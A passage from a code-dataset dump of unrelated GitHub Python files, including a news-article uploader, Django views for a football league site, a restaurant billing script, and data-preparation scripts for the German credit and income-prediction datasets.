thread_list:\n com = p.get() # get会阻塞\n com_list.append(com)\n else:\n com_list = thread_list\n com_list = [i for i in com_list if i is not None]\n\n # 删除文件夹\n shutil.rmtree(file_path, True)\n\n return com_list\n\n\n# 上传文章\ndef UploadArticle(dataJson: dict):\n try:\n if '验证码' not in str(dataJson.get('content')) and '验证码' not in str(dataJson.get('cssHtml')):\n resp = requests.post(url=ARTICLEUPLOAD, headers=articleHeaders, data=json.dumps(dataJson), timeout=60)\n if resp.json().get('ok'):\n print(\"文章id {0} *** upload Article successfully *** upload status {1}\".format(dataJson.get('id'), resp.json().get('code')))\n\n # 数据备份与标记\n url_coll.update_one({'hash_key': dataJson.get('id')}, {\"$set\":{'hash_key': dataJson.get('id'), 'status': 1}}, upsert=True)\n try:\n article_coll.insert_one(dataJson)\n except DuplicateKeyError:\n pass\n elif resp.json().get('status') == 500 and 'DuplicateKey' in resp.json().get('exception'):\n pass\n elif resp.json().get('status') == 500 and resp.json().get('error') == 'Internal Server Error':\n try:\n print(resp.json())\n url_coll.update_item({'hash_key': dataJson.get('id')}, {\"$set\":{'hash_key': dataJson.get('id'), 'status': 500}}, upsert=True)\n except:\n pass\n else:\n print(resp.json(), json.dumps(dataJson))\n else:\n print('--- 检测正文有验证码 ---')\n return\n except requests.exceptions.ConnectionError:\n print('上传文章网络问题,重试中...')\n return UploadArticle(dataJson)\n except Exception as error:\n log_err(error)\n","repo_name":"zhq910513/NewsSearch-0519","sub_path":"common/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":7996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31977279139","text":"from Bio import SeqIO\nfrom itertools import product\nimport re\n\n#dna = SeqIO.read(\"rosalind_sample.txt\", \"fasta\").seq\ndna = SeqIO.read(\"rosalind_orf.txt\", \"fasta\").seq\n\nwith open(\"rosalind_orf_result.txt\", \"w\") as output:\n orfs = []\n # check both strands and their frames\n for strand, frame in product([dna, dna.reverse_complement()], range(3)):\n # get full translation\n proteic_seq = str(strand[frame:].translate())\n # get ORFs, all regions starting with \"M\" and ending with \"*\"\n matches = re.findall('(?=(M.*?)\\*)', proteic_seq)\n #if matches:\n for match in matches:\n orfs.append(match)\n\n # use set to get distinct sequence as specified\n print(\"\\n\".join(set(orfs)), file=output)\n","repo_name":"dpflieger/Rosalind","sub_path":"Bioinformatics_stronghold/15_ORF/ORF.py","file_name":"ORF.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19354741879","text":"d={ \"1\": \"Pizza - 50rs\",\r\n \"2\": \"Burger - 40rs\",\r\n \"3\": \"Maggie - 30rs\",\r\n \"4\": \"Paties - 20rs\"}\r\nfor i in d:\r\n print(i+')', d[i])\r\n\r\nprint()\r\nfinal=[]\r\n\r\nl1=[0,1,2,3,4]\r\nl2=[\"Thank you\",\"Pizza\",\"Burger\",\"Maggie\",\"Paties\"]\r\nprice=[0,50,40,30,20]\r\n\r\np=1\r\nwhile p>0:\r\n t=int(input(\"Enter your Table Number: \"))\r\n x=int(input(\"Enter Dish Number: \"))\r\n for i in l1:\r\n if x>0:\r\n if i==x:\r\n a=(l2[i])\r\n print(a)\r\n final.append(a)\r\n print(\"Nice Choice! \")\r\n else:\r\n break\r\n print()\r\n for i in range(10):\r\n y=int(input(\"If you want something else, enter dish number, else enter 0.\\nPlease enter here: \"))\r\n if y!=0:\r\n for i in l1:\r\n if (i==y) :\r\n b=(l2[i])\r\n print(b)\r\n final.append(b)\r\n else:\r\n break\r\n if len(final)>0: \r\n print(\"your items are : \",final)\r\n else:\r\n print(\"You haven't ordered anything!\")\r\n\r\n fp=[]\r\n bill=[]\r\n for i in final:\r\n for j in l2:\r\n if i==j:\r\n q=l2.index(j)\r\n fp.append(q)\r\n#print(fp)\r\n for i in fp:\r\n w=price[i]\r\n bill.append(w)\r\n \r\n#print(bill)\r\n\r\n sum=0\r\n for i in bill:\r\n sum+=i\r\n print(\"Your Bill for table number \",int(t),'is: ', sum ,'rs')\r\n print(\"Glad to serve you, COME AGAIN !\")\r\n print()\r\n\r\n\r\n","repo_name":"arsh-dev/restaurant","sub_path":"final_shop.py","file_name":"final_shop.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25093805760","text":"from django.conf.global_settings import MEDIA_URL\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.db import IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.shortcuts import render, redirect\nfrom .models import *\nfrom .Forms import UserForm, TeamForm, PlayerForm, PlayerEditForm, Protocol, MatchForm\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group\n\n\n# Create your views here.\n\n\ndef base(request):\n return render(request, 'base.html')\n\n\ndef home(request):\n teams = Team.objects.all()\n return render(request, 'home.html', {'teams': teams})\n\n\ndef EditTeam(request):\n if request.user.groups.filter(name='Trener').exists():\n firstNameTrainer = request.user.first_name\n secondNameTrainer = request.user.last_name\n trainere = Trainer.objects.get_or_create(firstname=firstNameTrainer, secondname=secondNameTrainer)\n\n idTrainer = trainere[0].id_trainer\n\n try:\n idTeam = Team.objects.get(id_trainer=idTrainer).id_team\n number_of_players = Player.objects.filter(id_team=idTeam).count()\n\n logo = Team.objects.get(id_trainer=idTrainer).logo\n date_creation = Team.objects.get(id_trainer=idTrainer).date_creation\n\n except(KeyError, Team.DoesNotExist):\n return HttpResponseRedirect(reverse('mainapp:newTeamTrainer'))\n\n nameTeam = Team.objects.get(id_trainer=idTrainer).name\n players = Player.objects.filter(id_team=idTeam)\n return render(request, 'team.html',\n {'players': players, 'nameTeam': nameTeam, 'logo': logo, 'date_creation': date_creation,\n 'number_of_players': number_of_players})\n else:\n return render(request, 'error.html', {'message': \"Only trainers have permission to this section\"})\n\n\ndef matches(request):\n queues = Queue.objects.all()\n try:\n selected_choice = Queue.objects.get(idQueue=request.GET['queueid'])\n matches = Match.objects.filter(idQueue=selected_choice)\n except(KeyError, Queue.DoesNotExist):\n return render(request, 'matches.html', {'queues': queues})\n else:\n return render(request, 'matches.html',\n {'matches': matches, 'queues': queues, 'selected_choice': selected_choice})\n\n\ndef table(request):\n teamstats = StatsTeam.objects.all().order_by('-numberOfScores', '-numberOfMatchesWon')\n\n king_of_goals = StatsPlayerLeague.objects.all().order_by('-numberOfGoals')\n return render(request, 'teamstats.html', {'teamstats': teamstats, 'king_of_goals': king_of_goals})\n\n\ndef about(request):\n try:\n model = HTMLModels.objects.get(page_name='about')\n except ObjectDoesNotExist:\n return render(request, 'about.html')\n\n return render(request, 'about.html', {'model': model})\n\n\ndef register_form(request):\n form = UserForm(request.POST)\n\n if form.is_valid():\n user = form.save()\n group = form.cleaned_data['group_name']\n first_name = form.cleaned_data['first_name']\n second_name = form.cleaned_data['last_name']\n group.user_set.add(user)\n\n if str(group) == \"Trener\":\n trener = Trainer.objects.create(firstname=first_name, secondname=second_name)\n trener.save()\n return HttpResponseRedirect(reverse('mainapp:home'))\n else:\n form = UserForm()\n\n return render(request, 'register_form.html', {'form': form})\n\n\n@login_required\ndef new_team(request):\n form = TeamForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('mainapp:home'))\n return render(request, 'team_form.html', {'form': form})\n\n\n@login_required\ndef new_teamTrainer(request):\n form = TeamForm(request.POST or None, request.FILES or None)\n firstName = request.user.first_name\n lastName = request.user.last_name\n id_trainer = Trainer.objects.get(firstname=firstName, secondname=lastName).id_trainer\n if form.is_valid():\n form.save()\n name_team = form.cleaned_data['name']\n date_creation = form.cleaned_data['date_creation']\n # Team.objects.get(name=name_team,date_creation=date_creation)\n Team.objects.filter(name=name_team, date_creation=date_creation).update(id_trainer=id_trainer)\n return HttpResponseRedirect(reverse('mainapp:home'))\n return render(request, 'team_form.html', {'form': form})\n\n\n@login_required\ndef create_player(request):\n if request.user.groups.filter(name='Trener').exists():\n\n form = PlayerForm(request.POST)\n firstName = request.user.first_name\n lastName = request.user.last_name\n id_trainer = Trainer.objects.get(firstname=firstName, secondname=lastName).id_trainer\n id_team = Team.objects.get(id_trainer=id_trainer).id_team\n\n # if Player.objects.filter(id_team=id_team).count() > 3:\n # return render(request, 'error.html', {'message': \"You can only create 2 players\"})\n\n if form.is_valid():\n form.save()\n psl = form.cleaned_data['pesel']\n Player.objects.filter(pesel=psl).update(id_team=id_team)\n return HttpResponseRedirect(reverse('mainapp:team'))\n\n return render(request, 'RegisterTeamPlayer.html', {'form': form})\n else:\n return render(request, 'error.html', {'message': \"Only trainers have permission to this section\"})\n\n\n@login_required\ndef edit_player(request, pesel):\n player = get_object_or_404(Player, pk=pesel)\n\n form = PlayerEditForm(request.POST or None, request.FILES or None, instance=player)\n\n if form.is_valid():\n status = form.cleaned_data['statusHealth']\n position = form.cleaned_data['position']\n age = form.cleaned_data['age']\n\n Player.objects.filter(pesel=pesel).update(statusHealth=status)\n Player.objects.filter(pesel=pesel).update(age=age)\n Player.objects.filter(pesel=pesel).update(position=position)\n return HttpResponseRedirect(reverse('mainapp:team'))\n\n return render(request, 'EditPlayer.html', {'form': form})\n\n\n@login_required\ndef delete_player(request, pesel):\n player = get_object_or_404(Player, pk=pesel)\n\n if request.method == \"POST\":\n player.delete()\n return HttpResponseRedirect(reverse('mainapp:team'))\n\n return render(request, 'accept_delete_player.html', {'player': player})\n\n\ndef show_team_stats(request, idTeam):\n stats_team = get_object_or_404(StatsTeam, pk=idTeam)\n team = get_object_or_404(Team, pk=idTeam)\n count_scored_goals = 0\n for player in Player.objects.filter(id_team=idTeam):\n x = StatsPlayerLeague.objects.get(pesel=player.pesel).numberOfGoals\n count_scored_goals = count_scored_goals + x\n\n try:\n id_trainer = Trainer.objects.get(team__id_team=idTeam).id_trainer\n trainer = Trainer.objects.get(id_trainer=id_trainer)\n\n except ObjectDoesNotExist:\n return render(request, 'error.html', {'message': \"Error\"})\n return render(request, 'StatsTeam.html', {'stats_team': stats_team, 'team': team, 'trainer': trainer, 'count_scored_goals': count_scored_goals})\n\n\n@login_required\ndef protocol_refree(request, idMatch):\n if request.user.groups.filter(name='Sedzia').exists():\n try:\n match = get_object_or_404(Match, pk=idMatch)\n home = match.Home\n guest = match.Guest\n id_home_team = Team.objects.get(id_team=home.id_team)\n id_guest_team = Team.objects.get(id_team=guest.id_team)\n\n for player in Player.objects.filter(id_team=id_home_team):\n try:\n StatsPlayerMatch.objects.get(player=player, idMatch=match)\n except ObjectDoesNotExist:\n StatsPlayerMatch.objects.create(player=player, idMatch=match)\n\n for player in Player.objects.filter(id_team=id_guest_team):\n try:\n StatsPlayerMatch.objects.get(player=player, idMatch=match)\n except ObjectDoesNotExist:\n StatsPlayerMatch.objects.create(player=player, idMatch=match)\n\n players_home = Player.objects.filter(id_team=id_home_team)\n players_guest = Player.objects.filter(id_team=id_guest_team)\n\n except ObjectDoesNotExist:\n return render(request, 'error.html', {'message': \"That match doesnt exist\"})\n\n return render(request, 'protocol_refree.html', {'match': match, 'players_home': players_home,\n 'players_guest': players_guest, 'homeTeam': id_home_team,\n 'guestTeam': id_guest_team})\n\n return render(request, 'error.html', {'message': \"Only referees have permission to this section\"})\n\n\n@login_required\ndef edit_match(request, pesel, idMatch):\n global form, homeGoals, guestGoals\n\n if request.user.groups.filter(name='Sedzia').exists():\n\n id_player = get_object_or_404(Player, pk=pesel)\n stats = get_object_or_404(StatsPlayerMatch, player=id_player, idMatch=idMatch)\n home_team = Match.objects.get(idMatch=idMatch).Home\n guest_team = Match.objects.get(idMatch=idMatch).Guest\n match = get_object_or_404(Match, pk=idMatch)\n count_home_goals = 0\n count_guest_goals = 0\n current_goals = 0\n\n form = Protocol(request.POST or None, instance=stats)\n\n if form.is_valid():\n goals = form.cleaned_data['numberOfGoals']\n yellow_card = form.cleaned_data['numberOfYellowCard']\n StatsPlayerMatch.objects.filter(idMatch=idMatch, player=id_player).update(numberOfGoals=goals)\n StatsPlayerMatch.objects.filter(idMatch=idMatch, player=id_player).update(numberOfYellowCard=yellow_card)\n\n for match1 in Match.objects.all():\n if match1.Home == id_player.id_team or match1.Guest == id_player.id_team:\n goals_in_match = StatsPlayerMatch.objects.get_or_create(idMatch=match1, player=id_player)[0].numberOfGoals\n current_goals = current_goals + goals_in_match\n\n StatsPlayerLeague.objects.filter(pesel=id_player.pesel).update(numberOfGoals=current_goals)\n\n for player in Player.objects.filter(id_team=home_team):\n try:\n x = StatsPlayerMatch.objects.get(player=player, idMatch=idMatch).numberOfGoals\n count_home_goals = count_home_goals + x\n except ObjectDoesNotExist:\n count_home_goals = count_home_goals + 0\n\n for player in Player.objects.filter(id_team=guest_team):\n try:\n x = StatsPlayerMatch.objects.get(player=player, idMatch=idMatch).numberOfGoals\n count_guest_goals = count_guest_goals + x\n except ObjectDoesNotExist:\n count_guest_goals = count_guest_goals + 0\n\n #Match.objects.filter(idMatch=idMatch).update(homeGoals=count_home_goals)\n #Match.objects.filter(idMatch=idMatch).update(guestGoals=count_guest_goals)\n # match.homeGoals = count_home_goals\n # match.guestGoals = count_guest_goals\n # match.save()\n # if Match.finished_by_refree == -1:\n # Match.save(match)\n\n match.save_stats(match, count_home_goals, count_guest_goals)\n\n\n return HttpResponseRedirect(reverse('mainapp:protocol_refree', args=(idMatch,)))\n\n return render(request, 'Edit_stats_player.html', {'form': form, 'idmatch': idMatch})\n else:\n return render(request, 'error.html', {'message': \"Only referees have permission to this section\"})\n\n\n\n@login_required\ndef create_match(request):\n if request.user.groups.filter(name='Sedzia').exists():\n\n form = MatchForm(request.POST)\n\n if form.is_valid():\n form.save()\n Queue = form.cleaned_data['idQueue']\n home = form.cleaned_data['Home']\n guest = form.cleaned_data['Guest']\n Match.objects.filter(Home=home, Guest=guest, idQueue=Queue)\n return HttpResponseRedirect(reverse('mainapp:matches'))\n\n return render(request, 'createMatch.html', {'form': form})\n else:\n return render(request, 'error.html', {'message': \"Only referees have permission to this section\"})\n\n@login_required\ndef delete_match(request, idMatch):\n if request.user.groups.filter(name='Sedzia').exists():\n\n match = get_object_or_404(Match, pk=idMatch)\n\n if request.method == \"POST\":\n return HttpResponseRedirect(reverse('mainapp:matches'))\n\n return render(request, 'accept_delete_match.html', {'match': match})\n else:\n return render(request, 'error.html', {'message': \"Only referees have permission to this section\"})\n","repo_name":"pawciok1219/football_league_web","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29781717183","text":"\"\"\"\nGiven an array A of non-negative integers, half of the integers \nin A are odd, and half of the integers are even.\n\nSort the array so that whenever A[i] is odd, i is odd; and \nwhenever A[i] is even, i is even.\n\nYou may return any answer array that satisfies this condition.\n\nExample 1:\n\nInput: [4,2,5,7]\nOutput: [4,5,2,7]\nExplanation: \n[4,7,2,5], [2,5,4,7], [2,7,4,5] would also have been accepted.\n\"\"\"\n\nclass Solution:\n def sortArrayByParityII(self, A: List[int]) -> List[int]:\n B = [0] * len(A)\n odd, even = 1, 0\n \n for num in A:\n if num % 2:\n B[odd] = num\n odd += 2\n else:\n B[even] = num\n even += 2\n \n return B\n\n\n","repo_name":"EpsilonHF/Leetcode","sub_path":"Python/922.py","file_name":"922.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15815323262","text":"import urllib\nimport os\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import train_test_split, GridSearchCV, ParameterGrid\nimport pickle\nfrom itertools import chain\n\npickle_dir = 'german_pickles'\n\nprint(\n'''\nSource:\nProfessor Dr. Hans Hofmann\nInstitut f\"ur Statistik und \"Okonometrie\nUniversit\"at Hamburg\nFB Wirtschaftswissenschaften\nVon-Melle-Park 5\n2000 Hamburg 13\n\nData Set Information:\nTwo datasets are provided. the original dataset, in the form provided by Prof. Hofmann, contains categorical/symbolic attributes and is in the file \"german.data\".\nFor algorithms that need numerical attributes, Strathclyde University produced the file \"german.data-numeric\". This file has been edited and several indicator variables added to make it suitable for algorithms which cannot cope with categorical variables. Several attributes that are ordered categorical (such as attribute 17) have been coded as integer. This was the form used by StatLog.\n\nThis dataset requires use of a cost matrix:\n. 1 2\n------\n1 0 1\n-----\n2 5 0\n\n(1 = Good, 2 = Bad)\nThe rows represent the actual classification and the columns the predicted classification.\nIt is worse to class a customer as good when they are bad (5), than it is to class a customer as bad when they are good (1).\n'''\n)\n\n# helper function for data frame str / summary\ndef rstr(df):\n return df.shape, df.apply(lambda x: [x.unique()])\n\n# helper function for pickling files\ndef pickle_path(filename):\n return(pickle_dir + '\\\\' + filename)\n\n# random seed for test_train_split\nseed=123\n\nvar_names = ['chk'\n , 'dur'\n , 'crhis'\n , 'pps'\n , 'amt'\n , 'svng'\n , 'emp'\n , 'rate'\n , 'pers'\n , 'debt'\n , 'res'\n , 'prop'\n , 'age'\n , 'plans'\n , 'hous'\n , 'creds'\n , 'job'\n , 'deps'\n , 'tel'\n , 'foreign'\n , 'rating']\n\nvars_types = ['nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'continuous'\n , 'nominal'\n , 'nominal'\n , 'nominal']\n\nclass_col = 'rating'\nfeatures = [vn for vn in var_names if vn != class_col]\n\nif True:\n '''\n target_url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/statlog/german/german.data'\n\n german_bytes = urllib.request.urlopen(target_url)\n german = pd.read_csv(german_bytes,\n header=None,\n delimiter=' ',\n index_col=False,\n names=var_names)\n\n # re-code rating class variable\n rating = pd.Series(['good'] * german.count()[0])\n rating.loc[german.rating == 2] = 'bad'\n german.rating = rating\n\n # kill continuous vars for now\n # to_be_del = ['dur', 'amt', 'rate', 'res', 'age', 'creds', 'deps']\n #for tbd in to_be_del:\n # del german[tbd]\n # del vars_types[np.where(np.array(var_names) == tbd)[0][0]]\n # del var_names[np.where(np.array(var_names) == tbd)[0][0]]\n # del features[np.where(np.array(features) == tbd)[0][0]]\n\n german.to_csv(pickle_path('german.csv.gz'), index=False, compression='gzip')\n '''\n \ngerman = pd.read_csv(pickle_path('german.csv.gz'), compression='gzip')\n\n# the following creates a copy of the data frame with int mappings of categorical variables for scikit-learn\n# and also a dictionary containing the label encoders/decoders for each column\ngerman_pre = pd.DataFrame.copy(german)\n\nle_dict = {}\nvars_dict = {}\nonehot_dict = {}\n\nfor v, t in zip(var_names, vars_types):\n if t == 'nominal':\n # create a label encoder for all categoricals\n le_dict[v] = LabelEncoder().fit(german[v].unique())\n # create a dictionary of categorical names\n names = list(le_dict[v].classes_)\n # transform each categorical column\n german_pre[v] = le_dict[v].transform(german[v])\n # create the reverse lookup\n for n in names:\n onehot_dict[v + '_' + str(n)] = v\n else:\n german_pre[v] = german[v]\n\n vars_dict[v] = {'labels' : names if t == 'nominal' else None\n , 'onehot_labels' : [v + '_' + str(n) for n in names] if t == 'nominal' else None\n , 'class_col' : True if v == class_col else False\n , 'data_type' : t}\n\ncategorical_features=[i for i, (c, t) in enumerate(zip([vars_dict[f]['class_col'] for f in features],\n[vars_dict[f]['data_type'] == 'nominal' for f in features])) if not c and t]\n\n# creates a flat list just for the features\nonehot_features = []\ncontinuous_features = []\nfor f, t in zip(var_names, vars_types):\n if f == class_col: continue\n if t == 'continuous':\n continuous_features.append(f)\n else:\n onehot_features.append(vars_dict[f]['onehot_labels'])\n\n# They get stuck on the end by encoding\nonehot_features.append(continuous_features)\n# flatten out the nesting\nonehot_features = list(chain.from_iterable(onehot_features))\n\n# a function to return any code from a label\ndef get_code(col, label):\n return le_dict[col].transform([label])[0]\n\n# a function to return any label from a code\ndef get_label(col, label):\n return le_dict[col].inverse_transform([label])[0]\n\n# there is a bug in sklearn causing all the warnings. This should be fixed in next release.\ndef pretty_print_tree_votes(paths, preds, labels):\n for instance in paths.keys():\n print('Instance ' + str(instance) + ': True Class = ' +\n str(labels.values[instance]) + ' ' +\n str(get_label(class_col, labels.values[instance])) +\n ' Pred Class = ' + str(preds[instance]) + ' ' +\n str(get_label(class_col, preds[instance])) +\n ' Majority voting trees = ' + str(len(paths[instance])))\n\nclass_names = list(le_dict[class_col].classes_)\n\n# train test splitting\nX, y = german_pre[features], german_pre[class_col]\n\n# split into training and test\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=seed)\n\ntrain_priors = y_train.value_counts().sort_index()/len(y_train)\ntest_priors = y_test.value_counts().sort_index()/len(y_test)\n\n# one hot encoding required for classifier\n# otherwise integer vectors will be treated as ordinal\n# OneHotEncoder takes an integer list as an argument to state which columns to encode\nencoder = OneHotEncoder(categorical_features=categorical_features)\nencoder.fit(german_pre.as_matrix())\nX_train_enc = encoder.transform(X_train)\n\nif not os.path.exists(pickle_dir):\n os.makedirs(pickle_dir)\n\nencoder_store = open(pickle_path('encoder.pickle'), \"wb\")\npickle.dump(encoder, encoder_store)\nencoder_store.close()\n\nX_train_enc_store = open(pickle_path('X_train_enc.pickle'), \"wb\")\npickle.dump(X_train_enc, X_train_enc_store)\nX_train_enc_store.close()\n\ny_train_store = open(pickle_path('y_train.pickle'), \"wb\")\npickle.dump(y_train, y_train_store)\ny_train_store.close()\n\npickle_dir_store = open(\"pickle_dir.pickle\", \"wb\")\npickle.dump(pickle_dir, pickle_dir_store)\npickle_dir_store.close()\n\nprint('''Utility code in the associated file performs the following steps:\nset random seed for the test_train_split\nimport packages and modules\ndefines a custom summary function: rstr()\ncreate the list of variable names: var_names\ncreate the list of features (var_names less class): features\nimport the german.csv file\ncreate the pandas dataframe and prints head: german\ncreate the categorical var encoder dictionary: le_dict\ncreate a function to get any code for a column name and label: get_code\ncreate the dictionary of categorical values: categories\ncreates the list of one hot encoded variable names, onehot_features\ncreate the list of class names: class_names\ncreate the pandas dataframe with encoded vars: german_pre\ncreate the pandas dataframe containing all features less class: X\ncreate the pandas series containing the class 'decision': y\ncreate the training and test sets: X_train, y_train, X_test, y_test\nevaluate the training and test set priors and print them: train_priors, test_priors\ncreate a One Hot Encoder and encode the train set: X_train_enc\n(avoids treating variables as ordinal or continuous)\npickles objects that are needed by later steps: encoder, X_train_enc, y_train\ncreates a closure with the location of the pickle files for easy access to the stored datasets: pickle_path()\n''')\n\nprint(\"german.head()\")\nprint(german.head())\n\nshp, variables = rstr(german)\nprint()\nprint(\"shape\")\nprint(shp)\nprint()\nprint(\"variables summary\")\nprint(variables)\n\nprint(\"\\n\")\nprint(\"Training Priors\")\nfor c, p in zip(class_names, train_priors):\n print(c, p)\n\nprint(\"\\n\")\nprint(\"Test Priors\")\nfor c, p in zip(class_names, test_priors):\n print(c, p)\n","repo_name":"julianhatwell/interpret_basics2","sub_path":"german_dataprep.py","file_name":"german_dataprep.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10387965752","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# #### Importing libraries\n\n# In[1]:\n\n\n# from keras.callbacks import ModelCheckpoint\n# from keras.models import Sequential\n# from keras.layers import Dense, Activation, Flatten\n# from sklearn.model_selection import train_test_split\n# from sklearn.ensemble import RandomForestRegressor\n# from sklearn.metrics import mean_absolute_error \n# from matplotlib import pyplot as plt\n# import seaborn as sb\n# import matplotlib.pyplot as plt\n# import pandas as pd\n# import numpy as np\n# import warnings \n# warnings.filterwarnings('ignore')\n# warnings.filterwarnings('ignore', category=DeprecationWarning)\n# from xgboost import XGBRegressor\n\n\n# In[2]:\n\n\nimport numpy as np\nfrom sklearn.model_selection import cross_val_score, train_test_split\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport xgboost as xgb\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport joblib\n# from sklearn.metrics import accuracy_score\nimport category_encoders as ce\nfrom catboost import CatBoostRegressor\nimport random\nnp.random.seed(23)\n\n\n# #### Reading data set\n\n# In[3]:\n\n\ndef train_test():\n df = pd.read_csv('../Data/tcd ml 2019-20 income prediction training (with labels).csv')\n df['Income in EUR2'] = pd.qcut(df['Income in EUR'], 10, labels=False)\n y = df.pop('Income in EUR2')\n X_train, X_test, y_train, y_test = train_test_split(df, y, test_size=0.15, stratify=y)\n df_val = X_test\n df = X_train\n return df_val, df\n\n\n# #### Outlier Detection\n\n# In[4]:\n\n\ndef rem_outliers(df):\n df_ = df.copy()\n median = df['Income in EUR'].median()\n std = df['Income in EUR'].std()\n df_ = df_[df_['Income in EUR'] >= median - (2*std)]\n df_ = df_[df_['Income in EUR'] <= median + (2*std)]\n return df\n\n\n# #### Creating Train Test\n\n# In[5]:\n\n\ndef freq_chart_cat(df,a):\n df2 = df.groupby(a).agg({'Instance':'count'}).sort_values(by=a)\n ax = df2['Instance'].plot(kind='bar', title =a+\" Freq\", figsize = [df2.shape[0]*0.5,5], legend=True, fontsize=18)\n ax.set_xlabel(a, fontsize=20)\n ax.set_ylabel(\"Freq\", fontsize=20)\n print(a+' Frequency check \\n')\n print(df2)\n print(plt.show())\n print('\\n\\n')\n\ndef num_hist(df,a):\n plt.hist(df[a], normed=True, bins=20)\n plt.ylabel('Probability')\n plt.xlabel(a)\n print(a+' Frequency check \\n')\n print(plt.show())\n print('\\n\\n')\n\ndef data_explore(df, charts = 'False'):\n unique_size = []\n zeros = []\n cols = []\n blanks = []\n unknowns = []\n \n for i in df:\n cols.append(i)\n unique_size.append(str(round(df[i].nunique()*100/df.shape[0],2))+'%')\n\n l = list(df[i])\n n = 0\n m = 0\n u = 0\n for j in l:\n if str(j).strip() == '0':\n n += 1\n if str(j).strip == '':\n m += 1\n if str(j).lower() == 'unknown':\n u += 1\n zeros.append(n)\n blanks.append(m)\n unknowns.append(u)\n \n df_info2 = pd.DataFrame({'Data Type':df.dtypes.tolist(), 'Number of Nulls':df.isna().sum().tolist(), 'Number of Zeroes':zeros, 'Number of Blanks':blanks, 'Number of Unknowns':unknowns, 'Percentage of Unique Values':unique_size})\n df_info2.index = cols\n df_describe = pd.DataFrame(df.describe()).transpose()\n df_info3 = df_info2.merge(df_describe,left_on = df_info2.index, right_on = df_describe.index, how = 'left')\n df_info3 = df_info3.rename(columns = {'key_0':'columns'})\n df_info3 = df_info3.set_index('columns')\n \n if charts == 'True':\n for i in df.columns:\n if df[i].nunique() < 20:\n freq_chart_cat(df,i)\n if df[i].dtype.kind in 'bifc':\n num_hist(df,i)\n return df_info3\n\n\n# ### Data Cleaning\n# 1. Converting to lowercase\n# 2. replacing unknowns by NaN\n# 3. imputing nulls\n\n# In[6]:\n\n\ndef zero_to_nulls(df):\n for i in df:\n if df[i].dtype.kind in 'bifuc':\n df.loc[:,i] = df.loc[:,i].replace(0,np.nan)\n else:\n df.loc[:,i] = df.loc[:,i].replace('0',np.nan)\n return df\n\ndef unknown_to_nulls(df):\n for i in df:\n if df[i].dtype.kind not in 'bifuc':\n df.loc[:,i] = df.loc[:,i].replace('unknown',np.nan)\n return df\n\ndef convert_lower(df):\n for i in df:\n if df[i].dtype.kind not in 'biufc':\n df.loc[:,i] = df.loc[:,i].str.lower()\n df.loc[:,i] = df.loc[:,i].str.strip()\n return df\n\n\n# In[7]:\n\n\ndef cleaner1(df):\n df2 = convert_lower(df)\n df2 = unknown_to_nulls(df2)\n df2.loc[:,'Wears Glasses'] = df2.loc[:,'Wears Glasses'].apply(str)\n df2.loc[:,'Wears Glasses'] = np.where(df2.loc[:,'Wears Glasses'] == '0', 'No',np.where(df2.loc[:,'Wears Glasses'] == '1', 'Yes',df2.loc[:,'Wears Glasses']))\n df2.loc[:,'Gender'] = df2.loc[:,'Gender'].replace('other',np.nan)\n df2 = zero_to_nulls(df2)\n return df2\n\n\n# #### Treating profession variable\n\n# In[8]:\n\n\ndef unique(list1): \n # intilize a null list \n unique_list = [] \n # traverse for all elements \n for x in list1: \n # check if exists in unique_list or not \n if x not in unique_list: \n unique_list.append(x) \n return unique_list\n\ndef profession_cleaner(df, df2, stretch = 0.8):\n dfx = df[df['Profession'].notnull()]\n\n dfx = dfx[['Profession','Income in EUR']]\n\n dfx['Profession'] = dfx['Profession'].str.lower()\n\n chars = []\n for i in list(dfx['Profession']):\n for j in i:\n if (ord(j) in list(range(65,91))) or (ord(j) in list(range(97,123))):\n chars = chars\n else:\n chars.append(j)\n\n for i in unique(chars):\n if i != ' ':\n dfx['Profession'] = dfx['Profession'].str.replace(i,' ')\n\n df_prof = dfx['Profession'].str.split(' ', 10, expand=True)\n\n df_prof['Income in EUR'] = dfx['Income in EUR']\n\n l = []\n val = []\n for i in df_prof.columns[:-1]:\n df_prof2 = df_prof[df_prof[i].notnull()]\n m = df_prof2.iloc[:,i].tolist()\n n = df_prof2['Income in EUR'].tolist()\n for j in m:\n l.append(j)\n for k in n:\n val.append(k)\n\n df_prof3 = pd.DataFrame({'Words':l,'Income in EUR':val})\n df_prof4 = 